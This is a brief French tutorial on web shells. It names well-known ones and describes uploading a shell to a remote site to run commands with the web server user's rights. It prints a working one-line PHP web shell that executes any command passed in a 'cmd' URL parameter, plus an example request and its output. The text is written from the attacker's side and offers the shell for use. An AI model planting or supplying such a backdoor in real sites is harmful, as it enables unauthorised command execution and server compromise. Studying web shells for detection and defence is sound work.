WEBSHELL
1.Présentation
Un Web Shell est un script développé le plus souvent en PHP, ASP et qui permet d’exécuter des commandes à distance sur le serveur.
Les plus connu sont c99, c100, r57. Ce sont des webshells évolués permettant toute une multitude de possibilités.
c99 une backdoor backdooré c'est un comble non ?
2.Exploitation
Dans un premier temps il faut uploader ou insérer notre webshell dans le site web distant.
Dans un second temps nous pouvons exécuter toutes les commandes que nous souhaitons avec les droits de l'utilisateur web.
2.1 Méthode 1 : Script fait maison
Le script fait maison sera toujours la meilleur solution.
Il s’adaptera parfaitement à votre besoin.
Un webshell peut être concis , il n'est pas obligé d'être très long :
<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>
Afficher l'id de l'utilisateur
http://monsitefaillible.fr/webshell.php?cmd=id => uid=33(www-data) gid=33(www-data) groups=33(www-data)
2.2 Méthode 2 : Script récupéré
De nombreux webshells se trouvent sur internet. Analysez les avant de les utilisez , ils contiennent souvent des mauvaises surprises.